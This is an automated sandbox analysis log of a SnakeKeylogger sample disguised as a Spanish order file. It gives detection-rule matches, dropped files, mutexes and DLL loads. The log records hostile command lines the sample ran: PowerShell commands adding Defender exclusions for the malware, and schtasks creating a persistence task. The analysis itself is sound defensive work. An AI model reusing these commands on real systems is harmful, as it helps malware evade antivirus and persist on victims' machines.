Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: Nuevo pedido.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: QGVhHsAOjb.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@21/15@3/4

Source: C:\Users\user\Desktop\Nuevo pedido.exe

File created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Mutant created: \Sessions\1\BaseNamedObjects\eTndfbsPx
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03

Source: C:\Users\user\Desktop\Nuevo pedido.exe

File created: C:\Users\user\AppData\Local\Temp\tmp56AD.tmp

Jump to behavior

Source: Nuevo pedido.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Nuevo pedido.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\Nuevo pedido.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Nuevo pedido.exe

ReversingLabs: Detection: 44%

Source: C:\Users\user\Desktop\Nuevo pedido.exe

File read: C:\Users\user\Desktop\Nuevo pedido.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Nuevo pedido.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp56AD.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Process created: C:\Users\user\Desktop\Nuevo pedido.exe "C:\Users\user\Desktop\Nuevo pedido.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QGVhHsAOjb" /XML "C:\Users\user\AppData\Local\Temp\tmp69D7.tmp"
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process created: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe "C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe"

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Section loaded: iertutil.dll
